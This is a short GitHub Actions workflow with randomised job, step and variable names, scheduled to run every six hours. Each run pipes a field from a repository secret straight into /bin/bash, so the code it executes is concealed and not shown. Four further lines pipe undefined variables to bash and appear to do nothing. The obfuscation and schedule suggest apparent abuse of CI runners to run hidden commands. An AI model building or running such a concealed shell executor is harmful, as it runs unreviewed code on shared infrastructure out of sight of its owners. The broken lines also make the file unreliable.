name: maogechui4645
on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maogechui4645
        env:
          zif2327: ${{ secrets.zif2327 }}
        run: |
          echo $zif2327 | jq -r .xxckn3 | /bin/bash
          echo $ctsq961 | jq -r .za3 | /bin/bash
          echo $hn10599 | jq -r .lxcs261 | /bin/bash
          echo $cryd69 | jq -r .yzf559 | /bin/bash
          echo $bbnyw56 | jq -r .a74191 | /bin/bash

